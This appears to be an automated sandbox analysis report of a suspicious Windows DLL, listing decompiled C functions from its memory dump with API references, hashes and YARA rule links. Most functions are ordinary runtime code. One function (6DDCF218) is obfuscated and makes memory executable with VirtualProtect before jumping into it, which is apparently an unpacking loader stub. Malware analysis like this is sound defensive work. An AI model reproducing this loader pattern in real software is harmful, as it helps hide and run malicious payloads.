API String ID:
Opcode ID: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction ID: 14e5a91f94c5b246a43f3be70853349de686870a8f94da74297465997212d272
Opcode Fuzzy Hash: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction Fuzzy Hash: A57170319042179BDB118B59CD84EBEBB75FF56324F34422AE9207B288DF718945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1A737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DE1A737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6de9506c; // 0x657f4f7b
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6DE11F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6DDEF8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6DDEF8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6DDEF8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6DE2AC0E(_t56);
						_t40 = E6DE1CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6DE2AC0E(_t56);
						E6DE1CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6de9506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

APIs

_free.LIBCMT ref: 6DE1A7A9
_free.LIBCMT ref: 6DE1A7C9

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
Instruction ID: f9948bb4f53495da3d51da23fef36c75a6211a7a4eab3bd6f5a21648fa140d99
Opcode Fuzzy Hash: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
Instruction Fuzzy Hash: B841D372F883049FCB10CF78C880A6DB3B5EF85718B268169D515EB341DB31E906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6DE1D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6de951e4; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6DE1C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6DE24196(_t13, __eflags,  *0x6de951e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6DE1D33F(_t13, _t16, 0x6de976f0);
							E6DE1CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6DE1CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6DE24140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

APIs

GetLastError.KERNEL32(6DDD75D9,6DDD75D9,00000002,6DE12286,6DE1F2B0,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004), ref: 6DE1D688
_free.LIBCMT ref: 6DE1D6BD
_free.LIBCMT ref: 6DE1D6E4
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6F1
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6FA

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3f3c738ad13243b043e283431df6980965b4cc6138bc87ed4791f40d10a48a7d
Instruction ID: 6d0c336296668fd6d46426aa1a31bdbf9366203fc09114c24cd40b4279ae24e4
Opcode Fuzzy Hash: 3f3c738ad13243b043e283431df6980965b4cc6138bc87ed4791f40d10a48a7d
Instruction Fuzzy Hash: 9401A97E38D90227C70256355C89FBB3779ABD367DB72012AF518E6241EF74C8064168

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2CCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2CCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6de950b8; // 0x6de950b0
					if(_t23 != 0) {
						E6DE1CBD3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6de950bc; // 0x6de97248
					if(_t24 != 0) {
						E6DE1CBD3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6de950c0; // 0x6de97248
					if(_t25 != 0) {
						E6DE1CBD3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6de950e8; // 0x6de950b4
					if(_t26 != 0) {
						E6DE1CBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6de950ec; // 0x6de9724c
					if(_t27 != 0) {
						return E6DE1CBD3(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 6DE2CCDB

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2CCED
_free.LIBCMT ref: 6DE2CCFF
_free.LIBCMT ref: 6DE2CD11
_free.LIBCMT ref: 6DE2CD23

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction ID: 4ae0d2411ec80398bc369d2cd4c0d3d51c71714858a09412778a6c4f65e82bf4
Opcode Fuzzy Hash: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction Fuzzy Hash: BEF04F3170A20597CB10CA59E8C1D7B77FAAB0571C7714C0AE028EBA01CF30F8908AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDCF218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DDCF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t34;
				signed short _t36;
				void* _t44;
				intOrPtr _t45;
				signed int _t51;
				signed short _t59;
				signed char _t69;
				signed int _t72;
				signed char _t80;
				signed char _t83;
				signed short _t87;
				signed int _t96;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t108;
				void* _t109;
				signed char _t110;
				signed int _t112;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed char _t131;
				signed int _t132;
				signed char _t133;
				signed int _t135;
				void* _t136;
				signed short* _t137;
				signed short* _t140;
				signed short _t142;
				void* _t147;
				void* _t150;
				void* _t152;
				void* _t153;

				_t34 =  *0x6de959e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t102 = __edx;
				_v20 = 0xf;
				_t126 =  *0x6de959d8; // 0x8bb792d4
				_t140 = 0x6de959e6;
				_t135 =  *0x6de95a00; // 0x897548c8
				_v24 = _t34;
				_v16 = __edx;
				do {
					if(_t126 != _t34) {
						L3:
						_t5 = _t126 + 5; // 0x8bb792d9
						_t135 = _t135 * ( *_t140 & 0x0000ffff);
						_t36 =  *0x6de959f0; // 0x53e70090
						_t104 = _t5 + _t135;
						 *0x6de95a90 = _t104;
						if(_t104 != (_t36 & 0x0000ffff)) {
							_t34 = _v24;
							_t102 = _v16;
							goto L5;
						}
					} else {
						_t147 =  *0x6de959dc - _t102; // 0x5
						if(_t147 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t140 =  &(_t140[1]);
				} while (_t140 < 0x6de95a44);
				_t141 = _v12 * 0x10e1d;
				 *0x6de95a00 = _t135;
				_t136 =  *0x6deac8d0; // 0x6de986a0
				 *0x6de95a04 = _t126 -  *0x6de95a04 + 0x11;
				 *0x6de98698 = _t136;
				 *0x6de959d8 = E6DDF01E0(_v12 * 0x10e1d, 0, _t126,  *0x6de959dc);
				 *0x6de959dc = _t126;
				VirtualProtect(_t136, 0x305a, 0x40, 0x6de9869c);
				_t127 =  *0x6de959d0; // 0x4b767d5a
				_t44 = 6;
				_v24 = _t127;
				_t150 =  *0x6de95a02 - _t44; // 0x8975
				if(_t150 == 0) {
					_t45 =  *0x6de95a90; // 0x9b00ec0d
					 *0x6de95a00 = _t45 + 0x11dde + _t127;
				} else {
					 *0x6de95a90 =  *0x6de95a90 +  ~_t127 -  *0x6de95a00 * 0x3d;
				}
				_t105 =  *0x6de959d8; // 0x8bb792d4
				_t128 =  *0x6de959e6 & 0x0000ffff;
				_v5 = _t127 + _t105;
				if(( *0x6de959f2 & 0x0000ffff) + ( *0x6de959e6 & 0x0000ffff) != 0x32) {
					_t51 = E6DDF01E0(_t141, 0, _t105,  *0x6de959dc);
					_v16 = _t51;
					_v20 = _t51 * 0x00000037 & 0x0000ffff;
				} else {
					_t96 =  *0x6de959dc; // 0x5
					_t98 = E6DDF01E0(E6DDF01E0(_t105, _t96, _t105, _t96), _t128, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t98 + _v12 + 0xf;
				}
				_t137 = 0x6de959e6;
				_t108 = _v16;
				_t131 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t131;
				 *0x6de95a04 = _t131;
				_t152 =  *0x6de95a04 - 0x1b47; // 0x0
				if(_t152 != 0) {
					_t59 = _v20;
				} else {
					asm("cdq");
					_t131 = _v24;
					_t120 = _t108 + ( *0x6de959e6 & 0x0000ffff);
					_v16 = _t120;
					_t59 = _v20 + _t120 * 2 + 0x3b;
				}
				_t109 = 6;
				_t153 =  *0x6de95a02 - _t109; // 0x8975
				if(_t153 == 0) {
					 *0x6de95a00 = (_t59 & 0x0000ffff) + 0x11dde + (_t131 & 0x000000ff);
				}
				_t110 =  *0x6de959d0; // 0x4b767d5a
				 *0x6de959dc =  *0x6de959dc & 0x00000000;
				_t142 = _v16 + 0x00000005 + _t110 & 0x0000ffff;
				 *0x6de959d8 = _t142 - _v12 - 0x54;
				 *0x6de959d0 = _t110 + 0x23bbc + (_t131 & 0x000000ff) * 2;
				 *0x6de98698();
				_t69 =  *0x6de959d0; // 0x4b767d5a
				_t112 =  *0x6de95a04 & 0x000000ff;
				_t132 = _v12;
				 *0x6de959d8 =  *0x6de959d8 + _t69 + 0x3b + _t112;
				_t72 =  *0x6de959e6 & 0x0000ffff;
				asm("adc dword [0x6de959dc], 0x0");
				do {
					if(_t132 == _t72) {
						goto L22;
					} else {
						_t142 = ( *_t137 & 0x0000ffff) * (_t142 & 0x0000ffff) & 0x0000ffff;
						_t112 = _t132 + 5 + _t142;
						 *0x6de959dc = 0;
						_t87 =  *0x6de959f0; // 0x53e70090
						asm("cdq");
						 *0x6de959d8 = _t112;
						if(_t112 != (_t87 & 0x0000ffff) || 0 != _t132) {
							_t72 =  *0x6de959e6 & 0x0000ffff;
							_t132 = _v12;
							goto L22;
						}
					}
					break;
					L22:
					_t137 =  &(_t137[1]);
				} while (_t137 < 0x6de95a44);
				asm("sbb [ecx+0xd8b04b6], eax");
				asm("fcomp dword [ecx-0x17]");
				asm("insd");
				_t133 =  *0x6de959d0; // 0x4b767d5a
				_push(0);
				asm("adc [0x6de959dc], eax");
				 *0x6de959d8 = _t112 + (_t142 - _t112 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t133;
				_t80 = ((_t133 & 0x000000ff) * ( *0x6de95a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6de95a04 = _t80;
				_t83 = (_t80 & 0x000000ff) * 0x36 + _t133;
				 *0x6de959d0 = _t83;
				return _t83;
			}

APIs

VirtualProtect.KERNEL32(6DE986A0,0000305A,00000040,6DE9869C,?,00000000,8BB792D4,008B53E7,?), ref: 6DDCF2D5

Strings

DZm, xrefs: 6DDCF498
E1, xrefs: 6DDCF239, 6DDCF385
DZm, xrefs: 6DDCF27D

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: DZm$DZm$E1
API String ID: 544645111-2377189361
Opcode ID: e55ca055b39c89c320b6f8a6ab127823e00706b1ae648e1324e1a181f546f07d
Instruction ID: 1b7783ae907c16e810d5b0b03dee3187065b4f68668622b1d7abdac7a2d2ec32
Opcode Fuzzy Hash: e55ca055b39c89c320b6f8a6ab127823e00706b1ae648e1324e1a181f546f07d
Instruction Fuzzy Hash: 5481AAB2A032619FDB05DF79C8817B9BBF8BB46316B20812BF455DF281E3789540CB21

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDD4267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6DDF0117(0x6de380ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6de96b60;
				_t65 = E6DE11EEC(L"For");
				_t38 =  *0x6de96b60; // 0x6de3aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6de96b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6de96b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6de96b60
				_push( *_t8);
				E6DDD220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6de96b60; // 0x6de3aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6de96b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6de96b98; // 0x6de96bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6de96b60; // 0x6de3aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6de96ba0; // 0x20
										_t25 = _t55 + 0x6de96b98; // 0x6de96bb0
										_t56 = E6DDD3F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6de96ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6de96b98; // 0x6de96bb0
								_t59 = E6DDD3F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6de96b60; // 0x6de3aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6de96b60; // 0x6de3aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6de96b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6de96b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6de96b60; // 0x6de3aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6DDD3A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6DDD21C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6DDF0075( *((intOrPtr*)(_t85 - 0x14)));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 6DDD426E
_wcslen.LIBCMT ref: 6DDD4281

Strings

`km, xrefs: 6DDD42C8
For, xrefs: 6DDD4273, 6DDD4349

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`km
API String ID: 1260878687-3792942803
Opcode ID: 6731981707bbff6b063b313cdc422f51640cdf02ea738d32eb719e46f9161612
Instruction ID: 805db1fb6d86b2328a830b479fcb17d80f09f27435e626f7e2a550b16db03027
Opcode Fuzzy Hash: 6731981707bbff6b063b313cdc422f51640cdf02ea738d32eb719e46f9161612
Instruction Fuzzy Hash: 6341BE7964521DCFCF54EB9CCA909AC77F1BB4D728B21824AF5509B396EB30A841CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DE28AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t10 ^ _t49;
				 *0x6de95384 =  *0x6de95384 | 0xffffffff;
				 *0x6de95378 =  *0x6de95378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6de97a10 = 0;
				_t14 = E6DE21216(0x6de42130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6de42130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6DE1F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6DE21216(0x6de42130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6de42130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6DE1CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6DE1CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6DE28951(0x6de42130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6DE2877C(0x6de42130, _t37, _t57);
					}
				}
				E6DE1CBD3(_t43);
				_pop(_t44);
				return E6DDEF8A5(_v8 ^ _t47, _t35, _t44);
			}

APIs

_free.LIBCMT ref: 6DE28B1F
_free.LIBCMT ref: 6DE28B75

Part of subcall function 6DE28951: _free.LIBCMT ref: 6DE289A9
Part of subcall function 6DE28951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60

Strings

0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m
API String ID: 314583886-1802470889
Opcode ID: b2482b082ad039f4725fafc2edddb7d9864c62a3b69e1c2fad014fe884de3aaa
Instruction ID: 382091a1cc9b4e2e4ce92b309c3f226dc709ba75f3698e4bb3b12b129e784dad
Opcode Fuzzy Hash: b2482b082ad039f4725fafc2edddb7d9864c62a3b69e1c2fad014fe884de3aaa
Instruction Fuzzy Hash: DD210BB6D0921997DB2196248CC0EEBB778DB4272CF31069ED594F6240DF704D8186E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E6DDB1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6DDB1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6DDB1EBD(_t24, _t31, _t19);
						_push(0x6de93568);
						_push( &_v32);
					}
					E6DDF3D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDB1F4E

Strings

ios_base::failbit set, xrefs: 6DDB1F16
ios_base::eofbit set, xrefs: 6DDB1F1B
ios_base::badbit set, xrefs: 6DDB1F0C, 6DDB1F31

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
